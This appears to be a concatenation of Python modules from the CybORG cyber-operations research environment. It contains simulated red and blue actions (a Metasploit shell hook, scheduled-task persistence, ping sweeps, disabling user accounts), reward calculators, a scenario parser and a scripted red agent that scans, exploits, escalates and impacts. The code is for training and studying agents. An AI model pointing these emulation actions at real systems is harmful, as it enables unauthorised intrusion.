# Copyright DST Group. Licensed under the MIT license.
from csle_cyborg.shared.observation import Observation
from csle_cyborg.shared.scenario import Scenario
from .global_action import GlobalAction


class CreateGame(GlobalAction):
    """Creates a new game """

    def __init__(self, scenario: Scenario):
        super().__init__()
        self.scenario = scenario

    def emu_execute(self, team_server, *args, **kwargs) -> Observation:
        self._log_info("Creating new game")
        obs = Observation()
        new_game = team_server.create_new_game(self.scenario, self.config)
        obs.set_success(True)
        obs.add_key_value("game_id", new_game.game_id)

        obs.add_key_value("ip_hostname_map", {v: k for k, v in new_game.network.ip_hostname_map.items()})
        obs.add_key_value("cidr_subnet_map", {v.name: v.cidr for k, v in new_game.network.cidr_subnet_map.items()})

        return obs



# Copyright DST Group. Licensed under the MIT license.
from csle_cyborg.shared.observation import Observation
from csle_cyborg.shared.actions.action import Action


class GlobalAction(Action):
    """Abstract class for a global action.

    A global action is one that operates outside the context of any single
    scenario/game instance.

    Examples would be:
    - creating a new game
    - joining an existing game,
    - listing available games
    """

    def emu_execute(self, team_server) -> Observation:
        raise NotImplementedError



# Copyright DST Group. Licensed under the MIT license.

from csle_cyborg.shared.enums import QueryType
from csle_cyborg.shared.observation import Observation
from .velociraptor_action import VelociraptorAction


class VelociraptorDisableUser(VelociraptorAction):
    """Disables the account of a user on a host"""

    def __init__(self, session: int, agent: str, hostname: str, username: str):
        super().__init__(session=session,
                         query_type=QueryType.ASYNC,
                         agent=agent)
        self.agent = agent
        self.hostname = hostname
        self.username = username
        self.parameters['artifactname'] = 'Custom.CybORG.Generic.RunCommand'
        self.query = (
            'select collect_client(client_id="<host_id>", '
            'artifacts=["Custom.CybORG.Generic.RunCommand", '
            '"Custom.CybORG.Generic.RunOtherCommand"]], '
            'env=dict(command="net!user!<username>!/active:no", '
            'othercommand="chage!-E0!<username>")) FROM scope()'
        )
        self.source_query = (
            "select * from chain(a={select * from "
            "source(flow_id='<flowid>', client_id='<host_id>',"
            " artifact='Custom.CybORG.Generic.RunCommand')}, "
            "b={select * from "
            "source(flow_id='<flowid>', client_id='<host_id>', "
            "artifact='Custom.CybORG.Generic.RunOtherCommand')})"
        )

    def sim_execute(self, state):
        raise NotImplementedError

    def parse(self, results: list) -> Observation:
        """Parses the results of the execute action to create an observation"""
        obs = Observation()
        if results[0]['stderr'] == '' or results[1]['stderr'] == '':
            obs.set_success(True)
        else:
            obs.set_success(False)
        return obs



# Copyright DST Group. Licensed under the MIT license.

from csle_cyborg.shared.actions.action import Action


class RewardCalculator:
    def __init__(self, agent_name: str):
        self.agent_name = agent_name
        self.init_state = None
        self.init_obs = None
        self.previous_state = None
        self.previous_obs = None
        self.flat = False

        # Should this actually be a time.datetime?
        self.time = 0

    def calculate_reward(self, current_state: dict, action: dict, agent_observations: dict, done: bool) -> float:
        raise NotImplementedError

    def tick(self):
        self.time += 1

    def reset(self):
        self.previous_state = self.init_state
        self.previous_obs = self.init_obs
        self.time = 0


class EmptyRewardCalculator(RewardCalculator):
    def calculate_reward(self, current_state: dict, action: Action, agent_observations: dict, done: bool):
        return 0.



# Copyright DST Group. Licensed under the MIT license.
from ipaddress import IPv4Address
from csle_cyborg.shared.actions.msf_actions_folder.meterpreter_actions_folder.meterpreter_action import MeterpreterAction
from csle_cyborg.shared.enums import OperatingSystemType, SessionType, AppProtocol
from csle_cyborg.shared.observation import Observation
from csle_cyborg.simulator.state import State


# Call shell from a meterpreter session - gives a shell session
# Note the shell command has been known to fail after a session or metasploit server has been open for an extended
# time. This is not currently reflected in the simulation action.
class GetShell(MeterpreterAction):
    def __init__(self, agent: str, session: int, target_session: int):
        super().__init__(session=session, agent=agent, target_session=target_session)

    def sim_execute(self, state: State):
        obs = Observation()
        obs.set_success(False)
        if self.meterpreter_session not in state.sessions[self.agent]:
            return obs
        session = state.sessions[self.agent][self.meterpreter_session]

        if session.session_type != SessionType.METERPRETER or not session.active:
            return obs

        obs.set_success(True)

        if session.host.os_type == OperatingSystemType.WINDOWS:
            obs.add_system_info(hostid="0", os_type=OperatingSystemType.WINDOWS,
                                os_distribution=session.host.distribution, os_version=session.host.version)

        new_session = state.add_session(host=session.host.hostname, agent=self.agent,
                                        user=session.user.username, session_type="msf shell", parent=session)
        process = new_session.process
        process.ppid = session.process.pid
        process.path = "/bin/"
        process.name = "sh"
        port1 = new_session.host.get_ephemeral_port()
        port2 = new_session.host.get_ephemeral_port()
        new_connection = {
            "local_port": port1,
            "local_address": IPv4Address("127.0.0.1"),
            "remote_port": port2,
          "remote_address": IPv4Address("127.0.0.1"),
            "Application Protocol": AppProtocol.TCP

        }
        process.connections.append(new_connection)

        new_connection2 = {
            "local_port": port2,
            "local_address": IPv4Address("127.0.0.1"),
            "remote_port": port1,
            "remote_address": IPv4Address("127.0.0.1"),
            "Application Protocol": AppProtocol.TCP
        }
        session.process.connections.append(new_connection2)

        obs.add_session_info(hostid="0", username=new_session.user.username, session_id=new_session.ident,
                             pid=new_session.process.pid, agent=self.agent, session_type=new_session.session_type)
        return obs

    def emu_execute(self, session_handler) -> Observation:
        obs = Observation()
        from csle_cyborg.CybORG import MSFSessionHandler
        if type(session_handler) is not MSFSessionHandler:
            obs.set_success(False)
            return obs
        output = session_handler.execute_shell_action(action='shell', session=self.meterpreter_session)
        if output == 'Session Not Found':
            obs.add_raw_obs(output)
            obs.set_success(False)
        return obs


# Copyright DST Group. Licensed under the MIT license.
from collections import namedtuple
from csle_cyborg.shared.scenario import Scenario
from csle_cyborg.shared.enums import OperatingSystemType
from csle_cyborg.shared.reward_calculator import RewardCalculator

WIN_REWARD = 0
LOSE_REWARD = 0
SESSION_REWARD = 0
ROOT_SESSION_REWARD = 0
LOSE_SESSION_REWARD = 0
LOSE_ROOT_SESSION_REWARD = 0

REWARD_MAX_DECIMAL_PLACES = 1
HostReward = namedtuple('HostReward', 'confidentiality availability')


class PwnRewardCalculator(RewardCalculator):
    # this reward calculator provides a reward to Red due to changes in the number of privileged sessions
    def __init__(self, agent_name: str, scenario: Scenario):
        super().__init__(agent_name)
        self.old_total = 0
        self.scenario = scenario
        self.mapping = {'None': 0.0,
                        'Low': 0.1,
                        'Medium': 1.0,
                        'High': 10.0}

        self.compromised_hosts = {}

    def reset(self):
        self.old_total = 0

    def calculate_reward(self, current_state: dict, action: dict, agent_observations: dict, done: bool):
        root_sessions = 0
        system_sessions = 0
        self.compromised_hosts = {}
        for host, info in current_state.items():
            if host == 'success':
                continue

            if 'Sessions' in info:
                for session in info['Sessions']:
                    if session['Agent'] == self.agent_name:
                        # count the number of root sessions
                        if session['Username'] == 'root' and info['System info']['OSType'] == OperatingSystemType.LINUX:
                            confidentiality_value = self.mapping[
                                self.scenario.get_host(host).get('ConfidentialityValue', 'Low')]

                            root_sessions += confidentiality_value
                            self.compromised_hosts[host] = confidentiality_value
                            break
                        # count the number of SYSTEM sessions
                        if session['Username'] == 'SYSTEM' and info['System info'][
                            'OSType'] == OperatingSystemType.WINDOWS:
                            confidentiality_value = self.mapping[
                                self.scenario.get_host(host).get('ConfidentialityValue', 'Low')]
                            system_sessions += confidentiality_value
                            self.compromised_hosts[host] = confidentiality_value
                            break

        # find the difference from the old privileged sessions
        total = root_sessions + system_sessions
        reward = total  # - self.old_total
        self.old_total = total
        return round(reward, REWARD_MAX_DECIMAL_PLACES)


class DistruptRewardCalculator(RewardCalculator):
    # calculates the reward for disrupting the network
    def __init__(self, agent_name: str, scenario: Scenario):
        super(DistruptRewardCalculator, self).__init__(agent_name)
        self.scenario = scenario
        self.ots = None
        self.mapping = {'None': 0.0,
                        'Low': 0.1,
                        'Medium': 1.0,
                        'High': 10.0}

        self.impacted_hosts = {}

    def reset(self):
        self.ots = None

    def calculate_reward(self, current_state: dict, action: dict, agent_observations: dict, done: bool):
        self.impacted_hosts = {}
        # currently a single 1 reward is recieved if the Impact action is successful
        # TODO: Add in test to see what required services are up
        agent_action = action[self.agent_name]
        disrupted = []
        if self.ots is None:
            self.ots = []
            for host_info in current_state.values():
                if type(host_info) is not dict:
                    continue
                if 'Processes' in host_info:
                    for proc in host_info['Processes']:
                        if proc['Process Name'] == 'OTService':
                            self.ots.append(host_info['System info']['Hostname'])
        for host_info in current_state.values():
            working = False
            if type(host_info) is not dict:
                continue
            if host_info['System info']['Hostname'] in self.ots:
                if 'Processes' in host_info:
                    for proc in host_info['Processes']:
                        if proc['Process Name'] == 'OTService':
                            working = True
                    if not working:
                        disrupted.append(host_info['System info']['Hostname'])
        # if type(agent_action) is Impact and agent_observations[self.agent_name].data['success'] == True:
        #     if agent_action.hostname not in disrupted:
        #         disrupted.append(agent_action.hostname)
        availability_scores = [self.mapping[self.scenario.get_host(i).get('AvailabilityValue', 'Low')] for i in
                               disrupted]
        self.impacted_hosts = dict(zip(disrupted, availability_scores))
        reward = sum(availability_scores)
        return round(reward, REWARD_MAX_DECIMAL_PLACES)


class HybridImpactPwnRewardCalculator(RewardCalculator):
    # Hybrid of availability and confidentiality reward calculator
    def __init__(self, agent_name: str, scenario: Scenario):
        super(HybridImpactPwnRewardCalculator, self).__init__(agent_name)
        self.pwn_calculator = PwnRewardCalculator(agent_name, scenario)
        self.disrupt_calculator = DistruptRewardCalculator(agent_name, scenario)
        self.host_scores = {}

    def reset(self):
        self.pwn_calculator.reset()
        self.disrupt_calculator.reset()

    def calculate_reward(self, current_state: dict, action: dict, agent_observations: dict, done: bool) -> float:
        reward = self.pwn_calculator.calculate_reward(current_state, action, agent_observations, done) \
                 + self.disrupt_calculator.calculate_reward(current_state, action, agent_observations, done)

        self._compute_host_scores(current_state.keys())
        return round(reward, REWARD_MAX_DECIMAL_PLACES)

    def _compute_host_scores(self, hostnames):
        self.host_scores = {}
        compromised_hosts = self.pwn_calculator.compromised_hosts
        impacted_hosts = self.disrupt_calculator.impacted_hosts
        for host in hostnames:
            if host == 'success':
                continue
            compromised = compromised_hosts[host] if host in compromised_hosts else 0
            impacted = impacted_hosts[host] if host in impacted_hosts else 0
            reward_state = HostReward(compromised, impacted)
            # confidentiality, availability
            self.host_scores[host] = reward_state



# Copyright DST Group. Licensed under the MIT license.
import time
from csle_cyborg.shared.observation import Observation
from csle_cyborg.shared.actions.session_action import SessionAction


class LocalShellSleep(SessionAction):

    def __init__(self, session: int, t: int = 1):
        super().__init__(session)
        self.t = t

    def emu_execute(self, session_handler, *args, **kwargs):
        time.sleep(self.t)
        obs = Observation()
        obs.set_success(True)
        obs.add_raw_obs(f"I slept {self.t} secs")
        return obs



# Copyright DST Group. Licensed under the MIT license.

"""
This module contains functions for parsing a YAML scenario config file
"""
import os
import yaml
from copy import deepcopy
from prettytable import PrettyTable

path = os.path.dirname(os.path.abspath(__file__))
parent_dir = os.path.join(os.path.dirname(path), os.pardir)

# file path to available actions list
AVAIL_ACTIONS_PATH = os.path.join(path, 'actions', 'Actions.yaml')

# file path to available images list
AVAIL_IMAGES_PATH = os.path.join(path, 'Images', 'Images.yaml')

# The expected properties of a scenario config file
SCENARIO_KEYS_REQ = ["Subnets", "Hosts"]
SCENARIO_KEYS_OPT = ["RedActions"]

# Expected keys for each host
HOST_KEYS_REQ = ["subnet", "image"]
HOST_KEYS_OPT = ["value"]

# Optional params and default values for red actions
RED_ACTION_OPT = {
    "success_prob": 1,
    "cost": 0,
    "detect_prob": 0}

INT_host_list = ["IPs", "Subnets", "Creds", "OS_info", "Services", "Flag"]
INT_subnet_list = ["CIDR"]


# TODO parse simplicity of password

def load_yaml(file_path):
    """
    Load file located at file path, throws error if theres an issue loading
    file.

    Arguments:
        file_path : path to YAML scenario config file

    Returns:
        scenario : the scenario file as a dict
    """
    with open(file_path) as fIn:
        scenario_file = yaml.load(fIn, Loader=yaml.FullLoader)
    return scenario_file


def parse_scenario_file(scenario_file_path):
    """
    Load and parse a YAML scenario file.
    Throws exceptions if error loading file or file format is incorrect.

    Arguments:
        scenario_file_path : path to YAML scenario config file

    Returns:
        parsed_scenario : the parsed scenario as a dict
    """
    scenario = load_yaml(scenario_file_path)

    check_scenario_keys_correct(scenario)

    avail_actions = load_yaml(AVAIL_ACTIONS_PATH)
    avail_images_yaml = load_yaml(AVAIL_IMAGES_PATH)
    avail_images = {}

    scn_name = get_scenario_name(scenario_file_path)
    parsed_subnets = parse_subnets(scenario["Subnets"])
    parsed_hosts, num_hosts_with_pos_val = parse_hosts(scenario["Hosts"], parsed_subnets, avail_images)

    if "RedActions" not in scenario.keys():
        parsed_red_actions = load_default_red_action_dict(avail_actions["RedActions"])
    else:
        parsed_red_actions = parse_red_action_dict(scenario["RedActions"], avail_actions["RedActions"])

    if "OSINT" not in scenario.keys():
        parsed_OSINT = load_default_OSINT_dict(parsed_hosts)
    else:
        parsed_OSINT = parse_OSINT_dict(scenario["OSINT"], parsed_hosts, parsed_subnets)

    parsed_scenario = {"Name": scn_name,
                       "Hosts": parsed_hosts,
                       "Flags": num_hosts_with_pos_val,
                       "Subnets": parsed_subnets,
                       "RedActions": parsed_red_actions,
                       "OSINT": parsed_OSINT}

    return parsed_scenario


def check_scenario_keys_correct(scenario):
    """
    Checks the scenario contains all the necessary high-level keys in
    SCENARIO_KEYS

    Raises error if key incorrect or missing
    """
    for req_key in SCENARIO_KEYS_REQ:
        if req_key not in scenario.keys():
            raise KeyError("Scenario: Missing required key in scenario config file: {}".format(req_key))


def get_scenario_name(scenario_file_path):
    """
    Get the scenario name from the scenario file path.

    Arguments:
        str scenario_file_path : path to YAML scenario config file

    Returns:
        str scenario_name : name of scenario
    """
    return os.path.basename(scenario_file_path).replace('.yaml', '')


def parse_subnets(subnets):
    """
    Parse the Subnets dict, checking it is in correct format.
    Raises errors if there is a format violation.

    Arguments:
        subnets : the subnets dict

    Returns:
        parsed_subnets : parsed Subnet dict
    """
    if not isinstance(subnets, dict):
        raise ValueError("Subnets must be dict with key-value pairs: {}"
                         .format("subnet_id : [subnet_id, ..., subnet_id]"))

    if len(subnets) < 2:
        raise ValueError("Not enough subnets specified, need at least two:",
                         "one for attacker and one for target")

    parsed_subnets = {}
    avail_subnets = set(subnets.keys())
    for subnet_id, connected_list in subnets.items():
        if not isinstance(connected_list, list) or len(connected_list) < 1:
            raise ValueError("Subnet values must be list with at least one entry {} is invalid"
                             .format(connected_list))

        if subnet_id in connected_list:
            raise ValueError("Subnet connected list should not contain parent subnet: {}: {} invalid"
                             .format(subnet_id, connected_list))

        for connected_id in connected_list:
            if connected_id not in avail_subnets:
                raise ValueError("Subnets can only be connected to subnets with specified in top",
                                 "level subnet list: for subnet {} connected subnet {} invalid"
                                 .format(subnet_id, connected_id))

            if connected_list.count(connected_id) > 1:
                raise ValueError("Connected subnet lists cannot have duplicates: {}: {} invalid"
                                 .format(subnet_id, connected_list))
        parsed_subnets[subnet_id] = connected_list

    return parsed_subnets


def parse_hosts(hosts, subnets, avail_images):
    """
    Parse the Hosts dict, checking it is in correct format.
    Raises errors if there is a format violation.

    Arguments:
        hosts : the hosts dict
        subnets : the parsed subnets dictionary
        avail_images : the available images dictionary

    Returns:
        parsed_hosts : the parsed hosts dict
        num_hosts_with_pos_val : the number of hosts with a value
    """
    if not isinstance(hosts, dict):
        raise ValueError("Hosts: Hosts must be dict with key-values - host_ID: {}, plus optional params {}"
                         .format(HOST_KEYS_REQ, HOST_KEYS_OPT))

    if len(hosts) < 2:
        raise ValueError("Hosts: Not enough hosts specified (need at least one attacker and one host)")

    parsed_hosts = {}
    num_hosts_with_pos_val = 0
    for host_id, params in hosts.items():

        for req_key in HOST_KEYS_REQ:
            if req_key not in params:
                raise ValueError("Hosts: Host {} missing required parameter {}".format(host_id, req_key))

        parsed_host = {}
        subnet = params['subnet']
        if subnet not in subnets:
            raise ValueError("Hosts: Host subnet must be a subnet in scenario subnets: {} invalid".format(subnet))

        image = params['image']
        if image not in avail_images:
            raise ValueError(f"Hosts: Host VM image must be an image name from available VM image list: host {host_id} "
                             f"image {image} invalid.\nSee {AVAIL_IMAGES_PATH} file for list of available images")

        if "value" in params:
            value = params["value"]
            if not isinstance(value, (int, float)):
                raise ValueError("Hosts: Host value must be a valid integer or float: host {} value {} invalid"
                                 .format(host_id, value))
            value = int(value) if isinstance(value, int) else float(value)
            if value > 0:
                num_hosts_with_pos_val += 1
        else:
            value = 0

        parsed_host['subnet'] = subnet
        parsed_host['value'] = value
        parsed_host['image'] = avail_images[image]
        parsed_hosts[host_id] = parsed_host
        parsed_host['configuration'] = params.get('configuration', [])

    if num_hosts_with_pos_val < 1:
        raise ValueError("Hosts: At least one host must have a positive value (i.e. contain a goal)")

    return parsed_hosts, num_hosts_with_pos_val


def load_default_red_action_dict(avail_actions):
    """
    Loads all the available red actions for the CybORG environment with default parameter values.

    See Actions/Actions.yaml list for full list of available actions

    Arguments:
        avail_actions : dictionary of all available actions with names as keys and extra info as values

    Returns:
        parsed_actions : the parsed actions dict
    """
    print("RedActions: No actions specified so using list of all available actions with default params: {}"
          .format(RED_ACTION_OPT))

    parsed_actions = {}
    # for action_name, action_info in avail_actions.items():
    for action_name in avail_actions:
        parsed_params = deepcopy(RED_ACTION_OPT)
        parsed_params["name"] = action_name
        # for action_property, property_value in action_info.items():
        #     parsed_params[action_property] = property_value
        parsed_actions[action_name] = parsed_params
    return parsed_actions


def parse_red_action_dict(action_dict, valid_actions):
    """
    Parse the Red Actions dict.
    Raises excepted for any format violations

    Arguments:
        action_dict : the action dict to parse
        valid_actions : dictionary of valid actions with names as keys and extra info as values

    Returns:
        parsed_actions : the parsed actions dict
    """
    if not isinstance(action_dict, dict):
        raise ValueError("RedActions: Actions must be dict with key-value pairs: "
                         + "action_name : {action_param: value, ...}")

    for action_name in action_dict.keys():
        if action_name not in valid_actions:
            raise ValueError("RedActions: red can only choose actions from Actions list. {} invalid"
                             .format(action_name)
                             + "\nFor full list of actions see {}".format(AVAIL_ACTIONS_PATH))

    parsed_actions = {}
    for action_name, params in action_dict.items():
        if not isinstance(params, dict):
            raise ValueError("RedActions: Action parameters must be dict with key-value pairs: "
                             + "action_param: value. {}: {} is invalid. ".format(action_name, params)
                             + "\nIf you would like to use default values enter empty dictionary as '{}': "
                             + "e.g. Get_host_os: {}")

        parsed_params = {"type": valid_actions[action_name]}
        # parsed_params["name"] = action_name
        for action_param, value in params.items():
            parsed_value = None
            if action_param == "success_prob":
                parsed_value = float(value)
                if 0 > parsed_value or parsed_value > 1:
                    raise ValueError('RedActions: action param "success_prob" must have value from 0 to 1.',
                                     "Value {} for action {} invalid".format(value, action_name))

            if action_param == "cost":
                if not isinstance(value, (int, float)):
                    raise ValueError('RedActions: action param "cost" must be a int or float.'
                                     + "Value {} for action {} invalid".format(value, action_name))
                parsed_value = float(value)
                if parsed_value < 0:
                    print("RedActions: Warning: negative action cost detected for action {}.".format(action_name),
                          "Action costs are typically handled as a non-negative value. Change the scenario file if",
                          "this is an incorrect value, otherwise ignore this warning.")

            parsed_params[action_param] = parsed_value

        for opt_param, default_value in RED_ACTION_OPT.items():
            if opt_param not in parsed_params:
                parsed_params[opt_param] = default_value

        # for action_property, property_value in valid_actions[action_name].items():
        #     parsed_params[action_property] = property_value

        parsed_actions[action_name] = parsed_params

    return parsed_actions


def load_default_OSINT_dict(avail_hosts):
    """
    Loads the default OSINT for the CybORG environment.

    Arguments:
        avail_hosts : dictionary of all available hosts with names as keys and extra info as values

    Returns:
        parsed_OSINT : the parsed OSINT dict
    """
    print("OSINT: No OSINT specified so using publicly facing hosts")

    parsed_OSINT = {}
    # for action_name, action_info in avail_actions.items():
    for host in avail_hosts.keys():
        if "PublicFacing" in host:
            parsed_OSINT[host] = "IP"

    return parsed_OSINT


def parse_OSINT_dict(OSINT_dict, avail_hosts, avail_subnets):
    """
    Parse the Red Actions dict.
    Raises excepted for any format violations

    Arguments:
        action_dict : the action dict to parse
        valid_actions : dictionary of valid actions with names as keys and extra info as values

    Returns:
        parsed_actions : the parsed actions dict
        :param subnets:
    """
    if not isinstance(OSINT_dict, dict):
        raise ValueError("OSINT: OSINT must be dict with key-value pairs")

    parsed_OSINT = {}
    if "Hosts" in OSINT_dict:
        parsed_OSINT["Hosts"] = {}
        for host, l in OSINT_dict["Hosts"].items():
            if host in avail_hosts.keys():
                parsed_values = []
                if l is not None:
                    for v in l:
                        if v in INT_host_list:
                            parsed_values.append(v)
                        else:
                            raise ValueError("OSINT: intelligence on {} unavaliable".format(v))
                parsed_OSINT["Hosts"][host] = parsed_values
            else:
                raise ValueError("OSINT: Host {} specified by OSINT not found in scenario".format(host))
    if "Subnets" in OSINT_dict:
        parsed_OSINT["Subnets"] = {}
        for subnet, l in OSINT_dict["Subnets"].items():
            if subnet in avail_subnets.keys():
                parsed_values = []
                if l is not None:
                    for v in l:
                        if v in INT_subnet_list:
                            parsed_values.append(v)
                        else:
                            raise ValueError("OSINT: intelligence on {} unavaliable".format(v))
                parsed_OSINT["Subnets"][subnet] = parsed_values
            else:
                raise ValueError("OSINT: Subnet {} specified by OSINT not found in scenario".format(subnet))
    return parsed_OSINT


if __name__ == "__main__":
    import argparse

    parser = argparse.ArgumentParser()
    parser.add_argument("--file_path", type=str, default='./Scenarios/scenario_6_hosts.yaml',
                        help="file path of scenario YAML file (e.g. './scenario_0.yaml')")
    args = parser.parse_args()

    print(f"Parsing scenario file {args.file_path}")
    parsed_scenario = parse_scenario_file(args.file_path)
    print("Parsing complete")

    for k, v in parsed_scenario.items():
        table = PrettyTable()
        table.title = k
        if k == "Subnets":
            table.field_names = ["Name", "ConnectedTo"]
            for subnet, connected in v.items():
                table.add_row([subnet] + [connected])
            print(f"\n{table}\n")
            print("-" * 80 + "\n")
        elif k == "Hosts":
            print("\n{}\nHosts:\n".format("-" * 80))
            for name, vals in v.items():
                print(f"Name: {name}")
                for prop, prop_val in vals.items():
                    print(f"\t{prop}: {prop_val}")
                print("\n")
            print("-" * 80 + "\n")
            continue
        elif k == "Name":
            print(v)
        elif k == "OSINT":
            print("OSINT: ")
            print(v)
        elif k == "Flags":
            print(f"Number of flags: {v}")
        else:
            for name, vals in v.items():
                table = PrettyTable()
                headers = list(vals.keys())
                table.field_names = headers
                table.add_row(list(vals.values()))
                print(f"\n{table}\n")



# Copyright DST Group. Licensed under the MIT license.
from csle_cyborg.shared.observation import Observation
from csle_cyborg.shared.enums import QueryType
from .velociraptor_action import VelociraptorAction


class VelociraptorArtifactAction(VelociraptorAction):

    def __init__(self,
                 session: int,
                 hostname: str,
                 agent: str,
                 artifact: str,
                 env: dict = None,
                 flow_completion_wait_limit: int = 60,
                 query_type: QueryType = QueryType.ASYNC):
        super().__init__(session=session,
                         agent=agent,
                         query_type=query_type,
                         hostname=hostname,
                         poll_alerts=True)
        self.artifact = artifact
        self.flow_completion_wait_limit = flow_completion_wait_limit

        if env is None:
            env = {
                "agentid": agent,
                "artifactname": artifact,
                "tag": agent
            }
        self.env = env

    def emu_execute(self,
                    session_handler,
                    *args,
                    **kwargs):
        """Execute and action in emulator environment

        Parameters
        ----------
        session_handler : SessionHandler
           session handler object for game session of action (i.e. that
           matches session_id)

        Returns
        -------
        Observation
            Result of performing action
        """
        vel_controller = session_handler.controller
        client_id = vel_controller.get_client_id_for_hostname(self.hostname)

        results = vel_controller.execute_flow(
            client_id=client_id,
            artifact=self.artifact,
            env=self.env,
            completion_wait_limit=self.flow_completion_wait_limit
        )

        # Aren't getting the expected list in results, which results in exception


        obs = self.parse(results, client_id)

        if self.poll_alerts:
            obs = vel_controller.get_latest_alerts(obs)

        return obs

    def parse(self, results: list, client_id: str) -> Observation:
        """Parses the results of the execute action to create an observation"""
        raise NotImplementedError



# Copyright DST Group. Licensed under the MIT license.
from csle_cyborg.simulator.entity import Entity


class LocalGroup(Entity):
    def __init__(self, name: str = None, gid: int = None, users: list = None):
        super().__init__()
        self.name = name
        self.ident = gid
        self.users = users

    def get_state(self):
        return {"group": self.name,
                "gid": self.ident}

    def remove_user(self, user):
        for candidate in self.users:
            if user == candidate.username:
                self.users.remove(candidate)




# Copyright DST Group. Licensed under the MIT license.
from csle_cyborg.shared.actions.shell_actions_folder.persistence_folder.persistence import Persistence
from csle_cyborg.shared.observation import Observation

class Schtasks(Persistence):
    def __init__(self, session, agent, frequency, ip_address):
        super().__init__(session, agent)
        self.callback_ip = ip_address
        self.step_installed = 0
        self.frequency = frequency

    def sim_execute(self, state):
        obs = Observation()
        obs.set_success(False)
        if self.session not in state.sessions[self.agent]:
            return obs
        if not state.sessions[self.agent][self.session].active:
            return obs

        host = state.sessions[self.agent][self.session].host
        obs.add_system_info(hostid="hostid0", os_type=host.os_type)
        host.add_scheduled_task(self)
        obs.set_success(True)
        self.step_installed = state.step
        return obs

    def scheduled_task(self, step):
        if (step - self.step_installed) % self.frequency == 0:
            # SSH CONNECTION TO self.callback_ip
            pass



# Copyright DST Group. Licensed under the MIT license.
from csle_cyborg.shared.observation import Observation
from csle_cyborg.shared.actions.game_actions.game_action import GameAction


class ListAgents(GameAction):
    """List all active agents for given game.
    """

    def emu_execute(self, game_controller, *args, **kwargs) -> Observation:
        agent_ids = game_controller.list_agents()
        obs = Observation()
        obs.set_success(True)
        obs.add_key_value("agent_ids", agent_ids)
        return obs



# Copyright DST Group. Licensed under the MIT license.
from csle_cyborg.shared.actions.shell_actions_folder.network_scan_folder.network_scan import NetworkScan
from csle_cyborg.shared.observation import Observation


class PingSweep(NetworkScan):
    def __init__(self, session, subnet, agent):
        super().__init__(session, agent, subnet)

    def sim_execute(self, state):
        obs = Observation()
        if self.session not in state.sessions[self.agent]:
            obs.set_success(False)
            return obs

        if self.subnet in state.subnets:
            subnet = state.subnets[self.subnet]
        else:
            return obs
        from_host = state.sessions[self.agent][self.session].host

        if not state.sessions[self.agent][self.session].active:
            obs.set_success(False)
            return obs

        good = False
        for interface in from_host.interfaces:
            if self.subnet == interface.subnet:
                good = True
                break

        if not good:
            return obs

        for ip_address in subnet.ip_addresses:
            if state.ip_addresses[ip_address].respond_to_ping:
                obs.add_interface_info(ip_address=ip_address, subnet=self.subnet)

        return obs


import random
from csle_cyborg.agents.simple_agents.base_agent import BaseAgent
from csle_cyborg.shared.results import Results
from csle_cyborg.shared.actions.abstract_actions.privilege_escalate import PrivilegeEscalate
from csle_cyborg.shared.actions.abstract_actions.exploit_remote_service import ExploitRemoteService
from csle_cyborg.shared.actions.abstract_actions.discover_remote_systems import DiscoverRemoteSystems
from csle_cyborg.shared.actions.abstract_actions.impact import Impact
from csle_cyborg.shared.actions.abstract_actions.discover_network_services import DiscoverNetworkServices


class RedMeanderAgent(BaseAgent):
    # a red agent that meanders through scenario 1b
    def __init__(self):
        self.scanned_subnets = []
        self.scanned_ips = []
        self.exploited_ips = []
        self.escalated_hosts = []
        self.host_ip_map = {}
        self.last_host = None
        self.last_ip = None

    def train(self, results: Results):
        """allows an agent to learn a policy"""
        pass

    def get_action(self, observation, action_space):
        """gets an action from the agent that should be performed based on the agent's internal state and provided observation and action space"""
        self._process_success(observation)

        session = list(action_space['session'].keys())[0]

        # Always impact if able
        if 'Op_Server0' in self.escalated_hosts:
            self.last_host = 'Op_Server0'
            return Impact(agent='Red', hostname='Op_Server0', session=session)

        # start by scanning
        for subnet in action_space["subnet"]:
            if not action_space["subnet"][subnet] or subnet in self.scanned_subnets:
                continue
            self.scanned_subnets.append(subnet)
            return DiscoverRemoteSystems(subnet=subnet, agent='Red', session=session)
        # discover network services
        # # act on ip addresses discovered in first subnet
        addresses = [i for i in action_space["ip_address"]]
        random.shuffle(addresses)
        for address in addresses:
            if not action_space["ip_address"][address] or address in self.scanned_ips:
                continue
            self.scanned_ips.append(address)

            return DiscoverNetworkServices(ip_address=address, agent='Red', session=session)
        # priv esc on owned hosts
        hostnames = [x for x in action_space['hostname'].keys()]
        random.shuffle(hostnames)
        for hostname in hostnames:
            # test if host is not known
            if not action_space["hostname"][hostname]:
                continue
            # test if host is already priv esc
            if hostname in self.escalated_hosts:
                continue
            # test if host is exploited
            if hostname in self.host_ip_map and self.host_ip_map[hostname] not in self.exploited_ips:
                continue
            self.escalated_hosts.append(hostname)
            self.last_host = hostname
            return PrivilegeEscalate(hostname=hostname, agent='Red', session=session)

        # access unexploited hosts
        for address in addresses:
            # test if output of observation matches expected output
            if not action_space["ip_address"][address] or address in self.exploited_ips:
                continue
            self.exploited_ips.append(address)
            self.last_ip = address
            return ExploitRemoteService(ip_address=address, agent='Red', session=session)

        raise NotImplementedError('Red Meander has run out of options!')

    def _process_success(self, observation):
        if self.last_ip is not None:
            if observation['success'] == True:
                self.host_ip_map[[value['System info']['Hostname'] for key, value in observation.items()
                                  if key != 'success' and 'System info' in value
                                  and 'Hostname' in value['System info']][0]] = self.last_ip
            else:
                self._process_failed_ip()
            self.last_ip = None
        if self.last_host is not None:
            if observation['success'] == False:
                if self.last_host in self.escalated_hosts:
                    self.escalated_hosts.remove(self.last_host)
                if self.last_host in self.host_ip_map and self.host_ip_map[self.last_host] in self.exploited_ips:
                    self.exploited_ips.remove(self.host_ip_map[self.last_host])
            self.last_host = None

    def _process_failed_ip(self):
        self.exploited_ips.remove(self.last_ip)
        hosts_of_type = lambda y: [x for x in self.escalated_hosts if y in x]
        if len(hosts_of_type('Op')) > 0:
            for host in hosts_of_type('Op'):
                self.escalated_hosts.remove(host)
                ip = self.host_ip_map[host]
                self.exploited_ips.remove(ip)
        elif len(hosts_of_type('Ent')) > 0:
            for host in hosts_of_type('Ent'):
                self.escalated_hosts.remove(host)
                ip = self.host_ip_map[host]
                self.exploited_ips.remove(ip)

    def end_episode(self):
        self.scanned_subnets = []
        self.scanned_ips = []
        self.exploited_ips = []
        self.escalated_hosts = []
        self.host_ip_map = {}
        self.last_host = None
        self.last_ip = None

    def set_initial_values(self, action_space, observation):
        pass



from csle_cyborg.shared.observation import Observation
from csle_cyborg.shared.actions.concrete_actions.concrete_action import ConcreteAction
